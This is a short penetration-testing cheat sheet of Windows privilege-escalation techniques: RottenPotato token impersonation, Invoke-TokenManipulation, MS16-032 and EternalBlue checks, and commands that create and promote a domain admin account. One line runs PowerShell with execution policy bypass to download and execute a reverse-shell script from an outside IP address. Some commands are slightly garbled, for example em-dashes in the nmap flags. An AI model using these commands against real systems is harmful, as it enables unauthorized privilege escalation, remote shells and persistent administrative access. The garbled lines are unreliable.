Basic Exploits to Check

https://gist.github.com/ssstonebraker/a1964b2f20acc8edb239409b6c4906ce#gpo---pivoting-with-local-admin

PrivEsc Local Admin - Token Impersonation (RottenPotato)

Binary available at : https://github.com/foxglovesec/RottenPotato Binary available at : https://github.com/breenmachine/RottenPotatoNG

getuid
getprivs
use incognito
list\_tokens -u
cd c:\temp\
execute -Hc -f ./rot.exe
impersonate\_token "NT AUTHORITY\SYSTEM"

Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"

Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"

Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"

PrivEsc Local Admin - MS16-032 - Microsoft Windows 7

< 10 / 2008 < 2012 R2 (x86/x64)
Check if the patch is installed : wmic qfe list | find "3139914"

Powershell:

• https://www.exploit-db.com/exploits/39719/

• https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1

• Binary exe : https://github.com/Meatballs1/ms16-032

• Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc

PrivEsc Local Admin - MS17-010 (Eternal Blue)

• nmap -Pn -p445 — open — max-hostgroup 3 — script smb-vuln-ms17–010
• ip_netblock

From Domain Admin to Local Admin

net user hacker2 hacker123 /add /Domain
net group "Domain Admins" hacker2 /add /domain